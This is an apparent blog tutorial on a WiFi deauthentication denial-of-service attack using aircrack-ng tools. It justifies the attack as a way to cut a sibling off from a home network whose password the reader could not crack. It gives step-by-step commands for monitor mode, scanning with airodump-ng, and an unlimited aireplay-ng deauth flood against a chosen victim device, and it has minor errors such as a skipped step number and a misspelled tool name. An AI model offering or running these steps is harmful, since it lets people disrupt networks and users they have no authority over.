in this tutorial, we will not try to get the password of wifi. but we will try to send a lot of traffic on it. in this attack, we will disconnect a wifi user without knowing the password.

I mean we will perform dos attack on wifi.

WHY DO WE NEED TO DO IT:

suppose if you are in a situation where you have a proper wifi router setup on your home. but you don’t know the password. only your brother knows it. you tried to hack it. but the password is so strong to crack with a wordlist. now that you have no access to wifi, you will get so frustrated and will want that your brother shouldn’t be able to use wifi. here the dos attack will take a place.

 

REQUIREMENTS:

1.Kali Linux

2.aircrack-ng kit

3. wireless wifi-adapter

4. READ OUR LAST WIFI HACKING METHOD

 

ATTACK:

I am distributing this attack process in various steps so readers might understand it more easily. but let me clear, if you haven’t read our first part of WIFI hacking, then you might get a problem to understand it.

note- in this case you don’t need the wifi password.

 

step.1

start monitor mode of the wireless card:

airmon-ng wlan0 start

 

step.2

now that our wireless card is able to interact with other wifi networks, we can use airodump:

airodump wlan0

give it some time to search all wifi networks in your range.

step.3

when you have the router BSSID. you can use it to see the connected user:

airodump-ng wlan0mon --bssid <routers BSSID> --channel <routers channel>

place the BSSID and channel which were found with airodump command. it will show you the wifi users(one of them is your victim whom you wanna disconnect).

step.5

this is the last step. now that we have the BSSID of the wifi user. we can disconnect him/her with the simple aireply-ng command:

aireplay-ng --deauth 0 -c <DEVICES BSSID> -a <ROUTERS BSSID> wlan0mon

--deauth stands for the number of data packets. we have specified the 0 as the number of the data packets. because it means infinity data packets to send to our victim. -c stands for the BSSID of the victim device. and the -a stands for the router BSSID.

now as long as your computer will run, the victim will stay disconnected if he doesn’t change his BSSID.

 

 

Thanks For Visting.

 

LEAVE A REPLY

Please enter your comment!
Please enter your name here